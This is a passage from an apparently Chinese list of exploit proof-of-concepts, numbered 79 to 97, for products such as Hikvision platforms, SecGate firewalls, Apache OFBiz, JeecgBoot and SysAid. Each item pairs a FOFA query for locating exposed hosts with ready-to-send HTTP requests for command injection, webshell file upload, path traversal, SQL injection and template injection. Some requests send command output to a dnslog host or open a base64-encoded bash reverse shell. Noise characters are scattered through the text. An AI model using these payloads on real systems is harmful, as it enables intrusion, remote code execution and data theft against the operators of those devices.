Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
. P0 d7 A' }* W% v2 Q( c" h( A/ _9 S7 g: q+ Y
------YsOxWxSvj1KyZow1PTsh98fdu6l
8 _* s* b6 E7 D9 RContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"* r, @& l$ u$ G! \. L& p
Content-Type: image/png
0 `6 _! Y  E! X  l! H. I3 P' T+ C* R1 p, P! r) J& V/ e
YsOxWxSvj1KyZow1PTsh98fdu6l& @3 n  x6 Y2 J5 n8 m8 {
------YsOxWxSvj1KyZow1PTsh98fdu6l
' o8 Q6 @" h2 u: l  I# O3 oContent-Disposition: form-data; name="target"
4 J, e/ H/ z) v9 M
4 p7 i! m6 W6 g  f! f/Applications/SkillDevelopAndEHS/
- ?* G" P; M3 M0 @' g------YsOxWxSvj1KyZow1PTsh98fdu6l--& V0 z1 r/ T# r$ L
+ E& l: S' R  N; Q# q
  z$ x+ u+ f; E" A4 B
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
* D: a" V8 k' H5 k* z6 F+ pHost: x.x.x.x
( }! Z! ^& W$ K* ^2 r9 s
/ o  j4 a; b/ p+ s8 H* H' J; m, `% N2 K
79. BYTEVALUE 百为流控路由器远程命令执行
9 ~  ]3 g8 e6 G5 }0 VFOFA:BYTEVALUE 智能流控路由器0 C( O3 X) Y$ Y
GET /goform/webRead/open/?path=|id HTTP/1.14 s! U) w' f; _  M+ E$ a
Host:IP5 ~0 z* s8 ]  G6 \$ I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 }4 j5 b' A" b" EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 ^) _9 H- L/ b& q0 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. ?1 p2 P8 L5 |+ R. Q5 KAccept-Encoding: gzip, deflate
: O0 X% }8 L; H' z. aConnection: close# ?" a+ ^0 S& I- ^7 z% C
Upgrade-Insecure-Requests: 1
: K, q% d: r( y* h2 w8 s
, N" R6 |  {7 I$ n# g( ~
* M" A8 F7 l: k' F80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
' Z  n6 M1 T3 k, |4 h" s9 A0 E4 E8 @FOFA:app="速达软件-公司产品"! a$ ?3 @% u+ z5 h8 {" W2 S
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
7 U- E& t" V& v  ]Host: x.x.x.x
) Q2 o0 ]- Z; MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 K+ ~& `" A7 @! W1 A3 ^Content-Length: 27: j; g5 o1 ?  m) Y. [$ y3 R/ q1 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 v2 a/ F4 u  A3 p1 l% ~" f: N& ]7 Q; VAccept-Encoding: gzip, deflate$ u( @  q' d6 A6 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ S6 m# E( A/ A1 x/ @Connection: close
5 Q& F( G$ G7 W& {& g$ G0 tContent-Type: application/octet-stream
  W# ~' {- @6 J7 }Upgrade-Insecure-Requests: 16 h% M4 }# R" ~+ D

& b5 _8 q1 H# H) z  J* Y<% out.print("oessqeonylzaf");%>* e* I5 B" B$ R6 b7 v. @

4 e9 K+ P- K+ Y* s- O# y
% B7 H; q! g* u# L% B9 b$ _GET /xykqmfxpoas.jsp HTTP/1.1& {- s9 g5 C: n6 C! j
Host: x.x.x.x
! b( i. @  b0 J. T" p# MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ v8 l: F/ \, }: g' p- AConnection: close" q7 Q* T; d& \8 ?* G" w, o6 |5 N
Accept-Encoding: gzip
. E" Q2 V) _& I6 ]1 U  k
" |4 Y: ?# e+ t7 ^
( ^6 Y3 X; W/ S+ m7 q& e1 e* N81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
1 [  {7 I) C% p8 P* WFOFA:app="uniview-视频监控"
* b& S" l" Q& L! b5 Q" OGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
) R' B% {9 R, bHost: x.x.x.x
3 ^( }6 R2 _. F) iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( b# _2 L& ]$ z; O) s
Connection: close( C1 B) f; s" \7 _8 v, q
Accept-Encoding: gzip
) B% \, C, A9 Z
8 x! Q. e; {. n+ E/ _+ K6 {( ^; ^
. b1 F& Q$ z, Y. V) Q' |82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行5 x: g/ L' c7 e9 \7 |) f
FOFA:app="思福迪-LOGBASE"( Q2 ?0 h2 f- u. w: h
POST /bhost/test_qrcode_b HTTP/1.1! U& A( m/ x9 V7 v
Host: BaseURL" G8 D$ c9 @) e0 c+ h% x! L
User-Agent: Go-http-client/1.1
( D- r+ `- U: f# DContent-Length: 23. K$ u0 f. ^& e" R( d! r- s
Accept-Encoding: gzip
- E, B/ n- S8 A5 x4 d' ?4 ZConnection: close0 B; z" k) D# B+ @6 T) X! [7 P
Content-Type: application/x-www-form-urlencoded) O, m5 p% d) ^+ ]8 v# T
Referer: BaseURL
5 u% j& X0 [0 u% @9 M; q9 C/ @
z1=1&z2="|id;"&z3=bhost& [0 T* i/ Y8 g8 Z
8 `) P% J" ]8 P! R6 i5 B

' D) ]5 F. F* c& Z  H( ~83. JeecgBoot testConnection 远程命令执行
$ ?2 B! H) i( G0 ]3 uFOFA:title=="JeecgBoot 企业级低代码平台"
2 f" h6 a/ @4 W, N4 V; _. {$ u# R4 V. f" H+ f. c* w

" R( k. I  M" Y$ i- dPOST /jmreport/testConnection HTTP/1.1
- ]  v! a: L  v2 N8 p8 ~Host: x.x.x.x
" U, C6 i* r. X( OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 ?5 @- V" C; }: w  z, HConnection: close
5 ?: V4 s4 e( s1 d% d' p8 e6 gContent-Length: 8881
! I4 Q. r( {' P1 L* N3 u( DAccept-Encoding: gzip4 ?' l" _+ X5 `1 Y& ?& Q/ y
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
; Z" u% x6 O& v8 C  `* {: f8 V" {. Z6 ^Content-Type: application/json+ {1 _1 a* Q* V2 G8 }1 @

1 b* v# M' q+ c& y8 P! W3 P4 E7 ]PAYLOAD' W$ n4 y$ G7 _* a; [8 D. f

9 \/ y5 j0 O6 W& i84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; H9 f& p# H2 M) l7 Q, y5 y. }FOFA:title=="JeecgBoot 企业级低代码平台"
0 N+ x* M0 ~) ?1 a% N# B
1 d5 a6 L. i: v! }
1 b9 `. R/ S4 {4 K/ {" f' i* X5 \+ j' F8 d" r
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.18 M- U, r' L+ S1 q$ f
Host: 192.168.40.130:8080
8 A+ Q' I9 E- s; D" o. cUser-Agent: curl/7.88.1
: U5 P" i! v7 j3 s6 VContent-Length: 1560 t5 o' g; P. N8 W: O9 N
Accept: */*6 {- I5 M, b# R
Connection: close
1 ]" U( s1 ?: n+ r( k) sContent-Type: application/json. W6 G6 {/ I5 s6 _
Accept-Encoding: gzip
- H- G' L1 N  F+ d9 b( M* r; s; K2 h. y6 _' V8 q% K
{
& z4 ]8 ]8 F$ k8 R: U) ^ "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",' `0 n! u6 C8 U+ R" v2 r  G6 P
  "type": "0"8 g  d$ O! }! ?' _$ W
}2 i0 D. f; c/ M, N

/ c6 w, k; y6 q% ~  a+ }
; d7 F' d3 U- L, K7 \6 K# f, ~9 W85. SysAid On-premise< 23.3.36远程代码执行
( ?* {% m* D( @/ \3 T% Z, Z- F) TCVE-2023-47246
; u( y! |. h$ GFOFA:body="sysaid-logo-dark-green.png"
% {  S. }2 S) ~0 UEXP数据包如下,注入哥斯拉马
$ V$ h' \9 c7 J  A/ Y6 T# qPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
, x  s4 F/ y! x) w# H2 E! s( QHost: x.x.x.x
2 }9 J+ g+ w+ V, h4 }: F  X3 a: HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* z" C: [# L! t  d- p/ a
Content-Type: application/octet-stream
* }1 |6 r6 q, U: wAccept-Encoding: gzip
) @  d. q' A" U
3 V/ i5 n( W8 v* [" z  BPAYLOAD9 C9 {- a: ?4 ?

7 T0 U# [0 N' g回显URL:http://x.x.x.x/userfiles/index.jsp! t4 S7 k; O: w. |( e* K4 s

' D. @! \/ t# ^* X- y86. 日本tosei自助洗衣机RCE$ F" [3 [' K% p. b
FOFA:body="tosei_login_check.php"
, I( ^5 M: r- Y6 o0 L0 KPOST /cgi-bin/network_test.php HTTP/1.11 p1 q- c& ~/ Y% z( r0 r% v+ _
Host: x.x.x.x- Z" X  t9 g1 \7 j9 |* l* A7 N
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
$ C/ M& C) x+ U, M) }9 W& b' iConnection: close9 c! w' |* M/ Z7 ?2 ~3 E8 F! H- c
Content-Length: 44/ s: `! w6 ?9 c( A6 H
Accept: */*
& `$ t3 d" o& ]5 I8 oAccept-Encoding: gzip
9 A; Z' k+ m: M) nAccept-Language: en
! B* P3 F8 ~9 i; K$ [" Z; M( ZContent-Type: application/x-www-form-urlencoded
4 b" f5 r) x5 i- U3 @; t) \3 N  G+ u6 v; H/ q+ v' J6 c2 ^
host=%0acat${IFS}/etc/passwd%0a&command=ping
8 R5 ^0 \) a5 f7 n1 p2 M- s  V
6 c  \& z  r( e. n9 H
% f' y7 b. p4 S: q; {87. 安恒明御安全网关aaa_local_web_preview文件上传
4 m: s. k& `& K9 R$ B# @+ iFOFA:title="明御安全网关": s0 V+ q: `& U% U/ I- Q& l
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1( r0 l' v7 g) v& g
Host: X.X.X.X# |  o1 V' }4 E9 R: r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 X6 [& ]- @7 ^% [4 `# \9 |+ S) |
Connection: close8 B. _; m5 G8 x( S) a5 X+ D" h+ w% H1 @' m: T
Content-Length: 198
$ T) ?& @. W# ?8 zAccept-Encoding: gzip+ s8 ]/ s" a+ u5 ^/ {1 D6 i! R
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
2 D& A, f. }; u
0 k9 O8 F  V/ ], ~$ G8 T5 o--qqobiandqgawlxodfiisporjwravxtvd
( W( T1 v) @$ d7 C) P, e6 _Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
" i9 K7 |& E2 B# t( kContent-Type: text/plain- h; Z/ u! s1 a7 J9 i

! ^7 V0 ~+ y, q2ZqGNnsjzzU2GBBPyd8AIA7QlDq
: ~# T5 d' @6 H% C. e--qqobiandqgawlxodfiisporjwravxtvd--" S( [* e3 p, M6 [+ g
0 s" `8 n+ M" a+ g0 U4 m# [
0 ^( p1 ~1 G- x& d- O8 `% a
/jfhatuwe.php2 y) I* \& m2 e0 p

7 T- c$ O+ \! \7 ?+ h/ y, Y3 Q3 N, u88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
8 t: K- Y3 F, PFOFA:title="明御安全网关"& @& W/ f7 u. n0 Y+ V* z! P, F
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1! |4 A! B6 y# d( J
Host: x.x.x.xx.x.x.x4 y- _$ Y& v. ]( b+ z. q4 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 F2 ]( [" O( Y( j0 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 T7 A/ w$ v- B  I* J
Accept-Encoding: gzip, deflate
! _, P# K3 A  t* ]! TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 v! _- w, q9 nConnection: close
2 Z" N* J+ A) j3 S* R* l, e. d9 A+ r2 C- l. g! c( G% H- ?
  N) h% X, w% ^, H$ _: u: i2 e5 [0 G
/astdfkhl.php
  A+ m3 b/ g% G9 k
% y9 z! ]2 }: ~8 h89. 致远互联FE协作办公平台editflow_manager存在sql注入
/ [( @" n& u; ]FOFA:title="FE协作办公平台" || body="li_plugins_download"
: V. u) J- @+ G6 {" B' }POST /sysform/003/editflow_manager.js%70 HTTP/1.1$ o: u# d0 J- K# m# r* [+ S0 B; i8 ?
Host: x.x.x.x: K! H5 [3 M+ q" Q( L! z5 E+ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 A9 V/ ]  I  d% a9 @
Connection: close
- b+ N; e# L' Q5 T" ?0 xContent-Length: 41
* M% P+ ]/ g- L. {' UContent-Type: application/x-www-form-urlencoded
$ d; M- w- ^: qAccept-Encoding: gzip
! S6 M' S' B. V! w: l% |. L( n) k: ?6 K) l- O0 r  V* l
option=2&GUID=-1'+union+select+111*222--+
; q3 K! n1 i/ W& u
9 _7 ?* V: U" J2 g$ i6 o2 u! K& K2 w9 H
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行2 B* X2 o/ f7 A# B2 J; F+ h  l
FOFA:icon_hash="-1830859634"
. `; W2 y! C, g+ {9 rPOST /php/ping.php HTTP/1.14 O( ^) F3 l9 X/ {- s- c
Host: x.x.x.x
& E' i. @; p3 ^8 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
; K  g& ?& H/ vContent-Length: 519 E. W/ l# b# I, Q- m
Accept: application/json, text/javascript, */*; q=0.01
3 x; ^- m6 R/ d4 p# WAccept-Encoding: gzip, deflate
2 v& W, v5 ]- n, ~3 W( y0 U6 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ `) B# S% z' E9 RConnection: close( s0 L( N. P6 [) \$ C
Content-Type: application/x-www-form-urlencoded" Y9 K' `: r+ m( o* l- P; E2 a
X-Requested-With: XMLHttpRequest. ?' L+ f: M9 V- m/ r: ^, ?
0 u5 \8 V  \3 a. }! b
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig% X  z- [# u) D& y" n7 x& a

3 r0 O3 N. \1 N
* z3 W, N5 t" G91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ |7 p4 r+ Z  @5 z8 L5 a  r
FOFA:title="综合安防管理平台"* T) x$ D: F, {1 t1 B8 V& _7 I
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.19 J2 }+ G8 r9 K7 j% X
Host: your-ip
9 @) e5 _  ?: ^) N. DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.361 p4 R3 X' Z* n
Accept-Encoding: gzip, deflate
4 g8 Y: j7 ~. \, E% U% L3 E" h( IAccept: */*" C; e6 y* |' |  p6 [. h
Connection: keep-alive, q; [* y1 h4 N8 I( g  B
8 x9 k4 s: i  M5 Q) g* ~
. r* j2 J; {) {1 M

+ j3 Q; s) C8 J1 z! M- |8 ~; Y92. 海康威视运行管理中心session命令执行
. L( ~+ I: V4 ?8 s: KFastjson命令执行( L5 }9 t! r' f# ]
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
. n5 t* v$ Z/ l7 wPOST /center/api/session HTTP/1.1
3 u1 c" G. E( v$ S9 W2 R; ]( L- zHost:
/ A0 g. I' ^; s( W+ }4 x. F; ^8 m/ }Accept: application/json, text/plain, */*
( v& k+ X0 @+ m6 `8 {$ k" X2 KAccept-Encoding: gzip, deflate5 J$ y& Q( a: w2 n% {/ Q
X-Requested-With: XMLHttpRequest
8 x% s! Q2 e! ~9 s! b3 |( ]Content-Type: application/json;charset=UTF-8
( h9 V! X  F2 a# ?! T! }  C/ vX-Language-Type: zh_CN$ t# l7 t) B; D4 b1 R
Testcmd: echo test8 S" Z1 N+ K0 Y% T, `  a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
' Z# @' b; O  U! o; c: ?Accept-Language: zh-CN,zh;q=0.9( v2 t! @( ^' c% b1 P+ u: l
Content-Length: 5778
$ f, D4 z3 [) K
+ v( T: |* `) Z; r% S& BPAYLOAD
' ~. E8 c3 b! T# y
6 i' z- ^+ {$ O$ i2 @* ^- O$ ?0 T5 E9 ~; j" p6 J4 o
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传3 k" N$ N! U# V, s; U, B+ u6 T
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ o% ]9 Z/ B- S5 j7 V% R: cPOST /?g=app_av_import_save HTTP/1.10 P( U5 n3 t2 R, T5 g
Host: x.x.x.x
3 r8 \% c- q" VContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx3 @7 m" _3 h! [* z4 M6 ]# H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ O- z+ T' n9 a" Q( }
* O$ R; I- a4 E( |------WebKitFormBoundarykcbkgdfx
) M1 m8 C" k* \* |Content-Disposition: form-data; name="MAX_FILE_SIZE": u5 j1 ~8 A# ^
" m% ?  Y; ^& X& H9 u2 \
10000000$ E  \: F' n: l# Q+ N
------WebKitFormBoundarykcbkgdfx
$ G4 k7 P- E. F3 I7 [7 F' cContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"# i. H* t# F+ F" t2 K( V! T
Content-Type: text/plain
! B5 T, N1 p+ A! H, y; t& K& O. R9 [5 P8 M
wagletqrkwrddkthtulxsqrphulnknxa
8 Y9 A# c: ~. @/ ?# y------WebKitFormBoundarykcbkgdfx5 m6 L7 s6 Q3 n1 |5 f2 b  F) `
Content-Disposition: form-data; name="submit_post"2 V& O% s# R# G1 Y
& p, k0 Q. G6 i5 r- F
obj_app_upfile
! W3 t1 a( d$ B' ^4 X2 e------WebKitFormBoundarykcbkgdfx. q  O' C8 p4 s/ i, u2 ?+ [
Content-Disposition: form-data; name="__hash__"
, q& ?7 N2 M( W: O: [
) G# [8 S, G9 Q7 Z) Q: ~: _% y0b9d6b1ab7479ab69d9f71b05e0e9445
4 b+ ^6 p& o% J/ V( e' ]$ Q+ q' x/ S------WebKitFormBoundarykcbkgdfx--
* t( B$ U5 P8 z2 ]: l9 u
* ~$ @& X8 l& E* E( a+ A. ?4 j* ], x/ F; \; p; M! z3 i
GET /attachements/xlskxknxa.txt HTTP/1.1; K2 R2 ^( T& @; U7 c2 |
Host: xx.xx.xx.xx  G- o' [+ O' t- w5 u. {* Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ m# E& k: t+ M  I" E- S% u8 B
$ e: x) Q- c, A. M8 z- S
) U; Q5 P$ J+ U2 m( c6 b. D
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
# E4 R7 t( Z; B0 }+ RFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 p0 B1 z4 J9 O: [- D; H. j5 T
POST /?g=obj_area_import_save HTTP/1.1# w! `! |' n7 O: k0 K+ ^
Host: x.x.x.x3 S, T" P2 j& O9 N6 W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
" _4 X; ?- z3 }! y' W$ M4 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' w- T1 T$ z9 J5 x- }$ p: m7 w, {
. M- A  R: v5 c: |0 R
------WebKitFormBoundarybqvzqvmt
! L! O5 j. J" u8 q- Z' HContent-Disposition: form-data; name="MAX_FILE_SIZE"" P  \% ^4 j  L+ n3 b* y
$ N* g& X7 w" V( }* q
100000005 G1 Z4 {4 I( s( H. \
------WebKitFormBoundarybqvzqvmt" {4 x8 V7 f+ s0 L
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"" G$ G* n# O( `4 v% R2 `; b
Content-Type: text/plain5 r- w7 t9 T( s5 q6 @
/ q9 B, u5 s5 W6 g, ]' G
pxplitttsrjnyoafavcajwkvhxindhmu% g4 H( L, ~1 v/ [
------WebKitFormBoundarybqvzqvmt
0 H; R1 J# G) V- W7 C" AContent-Disposition: form-data; name="submit_post"
$ K" g$ i. K' G! `. X
- M1 m2 _. M! W! Tobj_app_upfile5 w% B' q* ?1 C& x0 Y' f0 d% Y
------WebKitFormBoundarybqvzqvmt* t. Q+ [8 P, O1 D+ `  P
Content-Disposition: form-data; name="__hash__"
: Z4 y! K7 z- Z- I9 D0 [- E# I, b3 n( j/ ?  E
0b9d6b1ab7479ab69d9f71b05e0e9445  e# o- W. W  B( k- y/ j
------WebKitFormBoundarybqvzqvmt--% @  \" D8 l' @; }/ T

! M) m: S+ H) c* ~/ ]& r1 S2 l3 ^5 V. T  w, I% L# H7 k; {

+ b9 r* Z4 \. r2 j, _" `2 `# }GET /attachements/xlskxknxa.txt HTTP/1.1; u% V  C% k  G; P7 A  F( p
Host: xx.xx.xx.xx5 b4 D! b5 B1 s: h4 U  A8 V2 n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% }& M! {3 D0 n' _+ d" ~- F) ]! V6 N$ w& {

: n8 b) K, |1 m# S/ W3 M" m
( n. O' |. n$ U2 s( ^6 G) x95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行/ x1 V* Q- c( _+ L2 _. F0 M
CVE-2023-49070
, \7 i2 n& M0 }7 m1 RFOFA:app="Apache_OFBiz"
3 P' t5 _4 h) S% S6 ?+ I, t+ |  u: i' mPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
4 R6 V: m8 {* i. d8 QHost: x.x.x.x
( |) D8 |! M$ Z: ^3 v1 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! X5 h. |6 o3 z2 Y! RConnection: close
% ]5 x4 n+ Q( F# j$ [Content-Length: 8898 I. G) @0 }0 \  v! F0 c
Content-Type: application/xml. A- d# B: f: R3 v
Accept-Encoding: gzip
. Y6 ]7 a) Z' |' d9 a, P0 [
( o/ }, e* T$ Q3 X* U) K8 }6 e+ ~8 i<?xml version="1.0"?>
0 P& f7 n; h; {( y<methodCall>
2 G' w  R* V  @  ~9 C& I   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName># M8 t# s! i1 g
    <params>
5 z6 D1 m/ ~0 f; V! c* o      <param>
2 U) b6 Y: p8 [' ?" F6 }+ N6 G- T      <value>* w1 y; b, W8 |
        <struct># M2 x# x/ o8 `  v5 W" i' v
       <member>5 S- b. G) w1 E% ^8 B6 s
          <name>test</name>, ?8 T$ R3 U% w$ K
          <value>( \8 j8 L& u4 ]3 b$ T
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>' l; t  L  S# _3 w3 C
          </value>
. V, \9 t* Y- y$ m        </member>  I9 S) {) S* u* [/ _8 |$ o
      </struct>2 H, m) H. l4 M) Z4 J- H+ U: k7 c
      </value>& @; Q( \4 b1 A$ a
    </param>
0 @$ p( u! g4 _$ v* g    </params>$ r/ G: r. I. |( J( h4 x/ ?: V
</methodCall>
( O2 R9 e5 n/ Y' A1 V) a* v0 U  N0 m; [. x" |' |% U

8 G$ ~8 F- x& E9 l% }/ H6 C$ q用ysoserial生成payload1 o7 x! |( B! V2 E
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
5 V9 B( P3 Z. y  ^1 m9 S, b5 |: T' n" X  `% ^- `

. f4 o* \  V, W  O2 J" N将生成的payload替换到上面的POC/ X" |# m) H# z" i- u4 M' p3 R
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1+ [( X, Y# J+ ?: g# Z# ^* X; t. _
Host: 192.168.40.130:8443
( O3 y% W; P- X5 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* _( O* b* H* a: H+ t+ @! ]" H, ]( p
Connection: close; H9 p" M& }. M
Content-Length: 889. |) P  K3 ]1 s; M5 {  J5 h, s4 t
Content-Type: application/xml
: p( [4 N0 x& c/ Y* e" v$ L0 |* I& Y8 JAccept-Encoding: gzip) J" k* Z" H; ?' i
  r. X% d! w6 \) p1 w- {
PAYLOAD
6 _' ?9 |  O+ W" s
. d8 q- k% W. d4 {. o+ A96. Apache OFBiz  18.12.11 groovy 远程代码执行
) k1 I0 m: f7 XFOFA:app="Apache_OFBiz"
9 e& e' F3 X# A' f! ^- X8 Q) iPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
" i. k8 `( ^1 y+ EHost: localhost:8443
. r" C2 d& Y: r1 ~8 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 a/ L7 J! H. ~% a+ w0 _
Accept: */*
) a9 Q8 x/ J, V' T8 Q/ c% {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 K& L: ^3 {) J+ J9 {) p! G( SContent-Type: application/x-www-form-urlencoded, @: C5 R1 h9 ^/ }: Q; g/ }# i+ x
Content-Length: 55  |, ~# s' m* t5 g7 o

& M: s" v( A; A5 C, ]& E$ BgroovyProgram=throw+new+Exception('id'.execute().text);
1 r: f, F7 w! h/ Q( U- J( K1 Z7 H. |% W7 X# i5 o2 h

1 g3 V- I0 h5 ?0 e反弹shell2 m/ `& d- q  c" X$ A+ G8 n
在kali上启动一个监听3 ]$ E% Q5 G- P& Y" ~/ Y! k3 _
nc -lvp 7777. t+ ^2 W  w( X- z2 [

# R9 N) t( W8 b; Z% ?" |( j, `POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
3 C8 Q( {& L. z  I; THost: 192.168.40.130:8443. J8 f$ l2 F  a$ g$ X( }. m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. r# j; c2 ^1 b$ t; fAccept: */*8 q% A# E- A2 r& U! L0 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" k9 }/ ?* P1 ^* l$ g2 d6 D
Content-Type: application/x-www-form-urlencoded
- y. |! b/ Z6 h5 EContent-Length: 71( k% V- F* e( h' g  _$ w

. H; N! H9 c2 H3 _groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
( q( @% E! a& J/ e6 d  w2 o
4 Y9 Z) A6 E! ~! F97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 G& P* ?( R$ X  VFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
. {4 R+ z" i' r0 x; t4 OGET /passport/login/ HTTP/1.10 K: A! u) _0 K1 N: e9 a6 V
Host: 192.168.40.130:8085. a1 ?  O( Y2 Q" R& P( \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 D9 e* [8 P, a& `; @, \2 d$ zAccept-Encoding: gzip
